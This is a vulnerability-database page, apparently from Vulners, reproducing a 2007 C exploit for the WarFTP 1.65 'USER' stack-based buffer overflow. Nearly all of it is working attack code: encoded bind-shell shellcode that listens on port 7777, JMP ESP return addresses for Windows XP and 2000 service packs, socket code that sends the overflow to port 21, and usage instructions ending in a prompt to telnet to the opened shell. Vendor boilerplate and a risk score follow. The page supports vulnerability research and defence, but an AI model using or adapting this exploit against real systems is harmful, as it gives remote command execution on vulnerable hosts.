Vulners
Lucene search
WarFTP 1.65 - 'USER' Remote Buffer Overflow
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#define VULNSERVER "WAR-FTPD 1.65"
#define VULNCMD "\x55\x53\x45\x52\x20"
#define ZERO '\x00'
#define NOP '\x90'
#define VULNBUFF 485
#define BUFFREAD 128
#define PORT 21
#define LENJMPESP 4
/* #############################################################################
##### #####
##### WARFTP - VERSION 1.65 #####
##### #####
##### WarFTP Username Stack-Based Buffer-Overflow Vulnerability #####
##### #####
##### DESCRIPTION: WarFTP is prone to a stack-based buffer-overflow #####
##### vulnerability because it fails to properly check boundaries #####
##### on user-supplied data before copying it to an insufficiently #####
##### sized buffer. #####
##### #####
##### FUNC VULNERABLE: sprintf(char *buffer, const char *format, argv) #####
##### 0x004044E7: sprintf(0x00ACFB50, "%sCRLF", ExploitBuffer) #####
##### #####
##### AFFECTED VERSION: 1.65 #####
##### USE: warftphack.exe IP_ADDRESS SO_&_SERVICE_PACK [ ESP ADDRESS ] #####
##### SO_&_SERVICE_PACK: #####
##### [0] Microsoft Windows XP Pro Spanish SP0 #####
##### [1] Microsoft Windows XP Pro Spanish SP1 #####
##### [2] Microsoft Windows XP Pro Spanish SP2 #####
##### [3] Microsoft Windows XP Pro English SP0 #####
##### [4] Microsoft Windows XP Pro English SP1 #####
##### [5] Microsoft Windows XP Pro English SP2 #####
##### [6] Microsoft Windows 2000 Pro Spanish SP0 #####
##### [7] Microsoft Windows 2000 Pro Spanish SP1 #####
##### [8] Microsoft Windows 2000 Pro Spanish SP2 #####
##### [9] Microsoft Windows 2000 Pro Spanish SP3 #####
##### [10] Microsoft Windows 2000 Pro English SP0 #####
##### [11] Microsoft Windows 2000 Pro English SP1 #####
##### [12] Microsoft Windows 2000 Pro English SP2 #####
##### [13] Microsoft Windows 2000 Pro English SP3 #####
##### [14] Custom -> JMP ESP ADDRESS #####
##### #####
##### EXAMPLE: warftphack.exe 127.0.0.1 2 #####
##### EXAMPLE2: warftphack.exe 127.0.0.1 14 0x776EDDFF #####
##### #####
##### AUTOR: niXel - SYSCODE (SPAIN) #####
##### IDE: Dev-C ver-4.9.9.2 #####
##### COMPILER: MinGW #####
##### DEPENDENCES: Linker -> libwsock32.a #####
##### MAIL: [email protected] #####
##### #####
#############################################################################
CAUTION: USER command vulnerable => no send \x40 (@) char into shellcode (user@host)
no send \x0A (\n) char into shellcode
no send \x0D (\r) char into shellcode
FUNCTION sprintf => no send \x00 (\0) char into shellcode
############################ BINDSHELLCODE ##############################
[7777] */
char syscode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32"
"\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35"
"\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e"
"\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65"
"\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46"
"\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b"
"\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48"
"\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b"
"\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46"
"\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34"
"\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74"
"\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46"
"\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71"
"\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e"
"\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30"
"\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58"
"\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d"
"\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51"
"\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e"
"\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51"
"\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41"
"\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70"
"\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70"
"\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c"
"\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69"
"\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69"
"\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f"
"\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b"
"\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41"
"\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74"
"\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30"
"\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62"
"\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e"
"\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63"
"\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46"
"\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48"
"\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b"
"\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50"
"\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49"
"\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49"
"\x6f\x58\x56\x49\x6f\x78\x50\x61";
int main(int argc, char ** argv) {
char buffRead[BUFFREAD], jmpESP[LENJMPESP], ch, ch2;
char * pbuffSend;
unsigned int err = 0, i, k;
int sockData, j;
struct sockaddr_in their_addr;
WSADATA wsaData;
system("cls");
fprintf(stdout, "\n\tWarFTP Username Stack-Based Buffer-Overflow Vulnerability\n");
fprintf(stdout, " ____________________________________________________________________\n\n");
if (((argc == 3) && (atoi(argv[2]) >= 0) && (atoi(argv[2]) < 14)) || ((argc == 4) && (atoi(argv[2]) == 14))) {
if (WSAStartup(MAKEWORD(2, 0), &wsaData) == 0) {
if ((sockData = socket(AF_INET, SOCK_STREAM, 0)) != -1) {
/* Server data struct */
their_addr.sin_family = AF_INET; // ; Family AF_INET
their_addr.sin_addr.s_addr = inet_addr(argv[1]); // ; IP Address = Argv[1]
their_addr.sin_port = htons(PORT); // ; Port = 21
memset(&(their_addr.sin_zero), '0', 8); // ; IP:Port = Argv[1]:21
if (connect(sockData, (struct sockaddr *) &their_addr, sizeof(struct sockaddr)) != -1) {
recv(sockData, buffRead, BUFFREAD, 0);
buffRead[BUFFREAD - 1] = ZERO;
if (strstr(buffRead, VULNSERVER) != NULL) {
/* #################################################################################
##### BufferSend -> "USER A*VULNBUFF @JMP_ESP \x90\x90\x90\x90 SYSCODE \r\n #####
################################################################################# */
pbuffSend = (char *) malloc(strlen(VULNCMD) + VULNBUFF + LENJMPESP + (sizeof(char) * 4) + strlen(syscode) + (sizeof(char) * 2));
if (pbuffSend != NULL) {
for (i=0; i < strlen(VULNCMD); i++) *(pbuffSend + i) = VULNCMD[i];
for (j=0; j < VULNBUFF; i++, j++) *(pbuffSend + i) = '\x41';
/* - OPcodes from ntdll.dll -> JMP ESP - */
switch(atoi(argv[2])) {
case 0: memcpy(jmpESP, "\xE3\x39\xF4\x77", LENJMPESP); break;
case 1: memcpy(jmpESP, "\x0F\x98\xF8\x77", LENJMPESP); break;
case 2: memcpy(jmpESP, "\xED\x1E\x95\x7C", LENJMPESP); break;
case 3: memcpy(jmpESP, "\xE3\x39\xF4\x77", LENJMPESP); break;
case 4: memcpy(jmpESP, "\xCC\x59\xFA\x77", LENJMPESP); break;
case 5: memcpy(jmpESP, "\xED\x1E\x95\x7C", LENJMPESP); break;
case 6: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 7: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 8: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 9: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 10: memcpy(jmpESP, "\x8B\x94\xF8\x77", LENJMPESP); break;
case 11: memcpy(jmpESP, "\xAB\x67\xF9\x77", LENJMPESP); break;
case 12: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 13: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 14:
k = 0;
if ((strncmp(argv[3], "0x", (sizeof(char) * 2)) == 0) && (strlen(argv[3]) == 10)) {
for (j=(sizeof(char) * 8) - 1; ((j >= 0) && (!err)); j--) {
ch = *(argv[3] + j + 2);
if (((ch > 47) && (ch < 58)) || ((ch > 64) && (ch < 71)) || ((ch > 96) && (ch < 103))) {
if ((ch > 47) && (ch < 58)) ch -= 48;
else if ((ch > 64) && (ch < 71)) ch -= 55;
else ch -= 87;
if ((j % 2) == 0) jmpESP[k++] = ((ch <<= 4) | ch2);
else ch2 = ch;
}
else { fprintf(stderr, "\t[ ERROR ] Three parameter syntax error\n\t[ ERROR ] Example: 0xFFFFFFFF\n"); err = 1; }
}
}
else { fprintf(stderr, "\t[ ERROR ] Three parameter syntax error\n\t[ ERROR ] Example: 0xFFFFFFFF\n"); err = 1; }
}
if (!err) {
for (j=0; j < LENJMPESP; i++, j++) *(pbuffSend + i) = jmpESP[j];
for (j=0; j < (sizeof(char) * 4); i++, j++) *(pbuffSend + i) = NOP;
for (j=0; j < strlen(syscode); i++, j++) *(pbuffSend + i) = syscode[j];
memcpy(pbuffSend + i, "\r\n", (sizeof(char) * 2));
if (i == send(sockData, pbuffSend, ++i, 0)) {
fprintf(stdout, "\t[ OK ] Exploit buffer send to %s:%d\n", argv[1], PORT);
fprintf(stdout, "\t[ OK ] If you have not chosen a correct operating system and\n\t service pack you can cause a D.O.S\n");
fprintf(stdout, "\t[ OK ] Connect: telnet %s 7777\n", argv[1]);
}
else fprintf(stderr, "\t[ ERROR ] No sending all exploit buffer\n");
}
free(pbuffSend);
}
else fprintf(stderr, "\t[ ERROR ] No allocate memory\n");
}
else fprintf(stderr, "\t[ ERROR ] Not a vulnerable server\n");
}
else fprintf(stderr, "\t[ ERROR ] Connect to %s:%d\n", argv[1], PORT);
closesocket(sockData);
}
else fprintf(stderr, "\t[ ERROR ] Create local socket\n");
WSACleanup();
}
else fprintf(stderr, "\t[ ERROR ] Load library");
}
else {
fprintf(stderr, " [ + ] USE: %s IP_ADDRESS SERVICE_PACK [ ESP_ADDRESS ]\n\n", argv[0]);
fprintf(stderr, " [ + ] SERVICE PACK: [ - ] Microsoft Windows XP Pro Spanish SP0 (0)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro Spanish SP1 (1)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro Spanish SP2 (2)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP0 (3)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP1 (4)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP2 (5)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP0 (6)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP1 (7)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP2 (8)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP3 (9)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP0 (10)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP1 (11)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP2 (12)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP3 (13)\n");
fprintf(stderr, "\t\t\t[ - ] Custom Service Pack - JMP %%ESP (14)\n\n");
fprintf(stderr, " [ + ] EXAMPLE: %s 127.0.0.1 2\n", argv[0]);
fprintf(stderr, " [ + ] EXAMPLE2: %s 127.0.0.1 14 0x776EDDFF\n", argv[0]);
}
fprintf(stdout, " ___________________________________________________________________\n\n");
return 0;
}
// milw0rm.com [2007-03-25]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Mar 2007 00:00Current
7.4High risk
Vulners AI Score7.4